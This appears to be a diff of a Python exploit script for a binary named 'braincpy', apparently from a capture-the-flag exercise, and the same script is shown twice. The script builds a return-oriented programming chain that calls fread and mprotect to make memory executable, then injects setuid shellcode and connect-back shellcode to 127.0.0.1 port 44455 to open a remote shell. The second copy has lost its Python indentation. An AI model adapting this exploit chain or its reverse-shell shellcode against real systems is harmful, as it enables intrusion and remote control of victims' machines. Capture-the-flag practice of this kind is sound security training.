otms61 · November 12, 2015 11:57
diff --git a/braincpy.py b/braincpy.py
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 import struct
 from subprocess import Popen, PIPE


 def p(a):
    return struct.pack("<I", a)

 # 0x080df815: add esp, dword [ebp+0x0A] ; ret  ;  (1 found)
 add_esp = 0x080df815

 # gdb-peda$ find 0xffffffa0
 # Searching for '0xffffffa0' in: None ranges
 # Found 1 results, display max 1 items:
 # braincpy : 0x8086c1c (<trecurse+92>:    mov    al,ds:0x89ffffff)
 neg_0x60 = 0x8086c1c

 # 080a94c0 <fread_unlocked>:
 libc_fread = 0x80a94c0

 # 0805a5a0 <__mprotect>:
 mprotect = 0x805a5a0

 # 080e5080 <_IO_2_1_stdin_>:
 io_stdin = 0x80e5080

 data_addr = 0x080e6030
 pop4ret = 0x80489db
 pop3ret = 0x80489dc
 leaveret = 0x80481d1
 # 0x080483a8: pop ebp ; ret  ;  (806 found)
 pop_ebp_ret = 0x080483a8

 payload = p(libc_fread)
 payload += p(pop4ret)
 payload += p(data_addr)
 payload += p(0x11111111)
 payload += p(0x11111111)
 payload += p(io_stdin)

 payload += p(pop_ebp_ret)
 payload += p(data_addr-4)
 payload += p(leaveret)
 payload += 'a' * (0x60 - 8 - len(payload))
 payload += p(neg_0x60 - 0xa)
 payload += p(add_esp)

 process = Popen(['./braincpy', payload], stdin=PIPE)

 # 6a 17                   push   0x17
 # 58                      pop    eax
 # 68 e8 03 00 00          push   0x3e8
 # 5b                      pop    ebx
 # cd 80                   int    0x80
 setuid = "\x6a\x17\x58\x68\xe8\x03\x00\x00\x5b\xcd\x80"

 # x86/linux/connect: 70 bytes
 # port=44455, host=127.0.0.1
 shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
    "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
    "\xad\xa7\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
    "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xb0\x0b\xcd\x80"
 )

 payload2 = ''
 payload2 += p(mprotect)
 payload2 += p(pop3ret)
 payload2 += p(0x080e4000)
 payload2 += p(0x4000)
 payload2 += p(0x7)
 payload2 += p(data_addr+24)
 payload2 += setuid + shellcode
 process.stdin.write(payload2)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import struct
	from subprocess import Popen, PIPE


	def p(a):
	return struct.pack("<I", a)

	# 0x080df815: add esp, dword [ebp+0x0A] ; ret ; (1 found)
	add_esp = 0x080df815

	# gdb-peda$ find 0xffffffa0
	# Searching for '0xffffffa0' in: None ranges
	# Found 1 results, display max 1 items:
	# braincpy : 0x8086c1c (<trecurse+92>: mov al,ds:0x89ffffff)
	neg_0x60 = 0x8086c1c

	# 080a94c0 <fread_unlocked>:
	libc_fread = 0x80a94c0

	# 0805a5a0 <__mprotect>:
	mprotect = 0x805a5a0

	# 080e5080 <_IO_2_1_stdin_>:
	io_stdin = 0x80e5080

	data_addr = 0x080e6030
	pop4ret = 0x80489db
	pop3ret = 0x80489dc
	leaveret = 0x80481d1
	# 0x080483a8: pop ebp ; ret ; (806 found)
	pop_ebp_ret = 0x080483a8

	payload = p(libc_fread)
	payload += p(pop4ret)
	payload += p(data_addr)
	payload += p(0x11111111)
	payload += p(0x11111111)
	payload += p(io_stdin)

	payload += p(pop_ebp_ret)
	payload += p(data_addr-4)
	payload += p(leaveret)
	payload += 'a' * (0x60 - 8 - len(payload))
	payload += p(neg_0x60 - 0xa)
	payload += p(add_esp)

	process = Popen(['./braincpy', payload], stdin=PIPE)

	# 6a 17 push 0x17
	# 58 pop eax
	# 68 e8 03 00 00 push 0x3e8
	# 5b pop ebx
	# cd 80 int 0x80
	setuid = "\x6a\x17\x58\x68\xe8\x03\x00\x00\x5b\xcd\x80"

	# x86/linux/connect: 70 bytes
	# port=44455, host=127.0.0.1
	shellcode = (
	"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
	"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
	"\xad\xa7\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
	"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
	"\x89\xe1\xb0\x0b\xcd\x80"
	)

	payload2 = ''
	payload2 += p(mprotect)
	payload2 += p(pop3ret)
	payload2 += p(0x080e4000)
	payload2 += p(0x4000)
	payload2 += p(0x7)
	payload2 += p(data_addr+24)
	payload2 += setuid + shellcode
	process.stdin.write(payload2)